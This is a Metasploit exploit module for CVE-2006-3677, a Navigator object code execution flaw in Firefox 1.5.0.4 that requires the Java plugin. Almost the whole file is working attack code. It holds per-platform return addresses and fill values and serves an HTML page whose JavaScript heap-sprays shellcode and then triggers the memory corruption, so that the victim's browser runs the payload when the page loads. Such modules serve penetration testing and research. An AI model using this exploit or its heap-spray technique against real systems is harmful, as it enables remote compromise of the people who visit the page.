GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/mozilla_navigatorjava.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # HTTP-server mixin: provides the listener, the on_request_uri callback
  # contract and the send_response_html helper used below.
  include Msf::Exploit::Remote::HttpServer::HTML

  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({
  # :ua_name => HttpClients::FF,
  # :ua_minver => "1.5.0",
  # :ua_maxver => "1.5.1",
  # :javascript => true,
  # :rank => NormalRanking, # reliable memory corruption
  # :vuln_test => %Q|
  # is_vuln = false;
  # if (navigator.javaEnabled()){
  # is_vuln = true;
  # }
  # |,
  #})

  # Registers the module metadata with the framework: name, description,
  # references (CVE-2006-3677 / MFSA 2006-45), payload constraints and the
  # target table.  Each target's 'Ret' and 'Fill' entries are read back by
  # generate_html, so every target must define both.
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',
      'Description' => %q{
This module exploits a code execution vulnerability in the Mozilla
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
requires the Java plugin to be installed.
},
      'License' => MSF_LICENSE,
      'Author' => ['hdm'],
      'References' =>
        [
          ['CVE', '2006-3677'],
          ['OSVDB', '27559'],
          ['BID', '19192'],
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']
        ],
      # 512 bytes of payload space; BadChars is empty, so no bytes are excluded.
      'Payload' =>
        {
          'Space' => 512,
          'BadChars' => "",
        },
      'Platform' => %w{ win linux osx },
      # One entry per platform/arch.  'Ret' is interpolated into the served
      # page as a JavaScript number and 'Fill' as a %u-escaped string.
      'Targets' =>
        [
          [ 'Firefox 1.5.0.4 Windows x86',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
              'Ret' => 0x08000800,
              'Fill' => "%u0800",
            }
          ],
          [ 'Firefox 1.5.0.4 Linux x86',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
              'Ret' => -0x58000000,
              'Fill' => "%ua8a8",
            }
          ],
          [ 'Firefox 1.5.0.4 Mac OS X PPC',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
              'Ret' => 0x0c000000,
              'Fill' => "%u0c0c",
            }
          ],
          [ 'Firefox 1.5.0.4 Mac OS X x86',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
              'Ret' => 0x1c000000,
              'Fill' => "%u1c1c",
            }
          ],
        ],
      'DisclosureDate' => '2006-07-25'
    ))
  end

  # Request callback invoked by the HTTP server mixin.  The request itself
  # is never inspected, so the same page is returned for any URI.
  #
  # @param cli     client connection handed in by the HttpServer mixin
  # @param request incoming HTTP request (unused)
  def on_request_uri(cli, request)

    # Re-generate the payload for this client.  A nil result (presumably no
    # usable payload could be built) ends the request without a response.
    return if ((p = regenerate_payload(cli)) == nil)

    print_status("Sending #{self.name}")
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

    # Handle the payload
    handler(cli)
  end

  # Builds the HTML document returned to the client.  The encoded payload is
  # turned into a %u-escaped string by Rex::Text.to_unescape, using the byte
  # order of the selected target's arch; the target's 'Fill' and 'Ret' values
  # are interpolated straight into the script.  Both come from this module's
  # own target table rather than from the request, so no escaping is applied.
  # A target lacking either key interpolates as an empty string and yields a
  # broken script rather than a Ruby error.
  #
  # @param payload payload object returned by regenerate_payload; only
  #   payload.encoded is read
  # @return [String] the complete HTML page
  def generate_html(payload)

    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    return %Q|
<html><head>
<script>
function Exploit() {
if (window.navigator.javaEnabled) {
var shellcode = unescape("#{enc_code}");
var b = unescape("#{target['Fill']}");
while (b.length <= 0x400000) b+=b;

var c = new Array();
for (var i =0; i<36; i++) {
c[i] =
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode;
}

window.navigator = (#{target['Ret']} / 2);
try {
java.lang.reflect.Runtime.newInstance(
java.lang.Class.forName("java.lang.Runtime"), 0
);
}catch(e){

}
}
}
</script>
</head><body onload='Exploit()'>Please wait...</body></html>
|
  end
end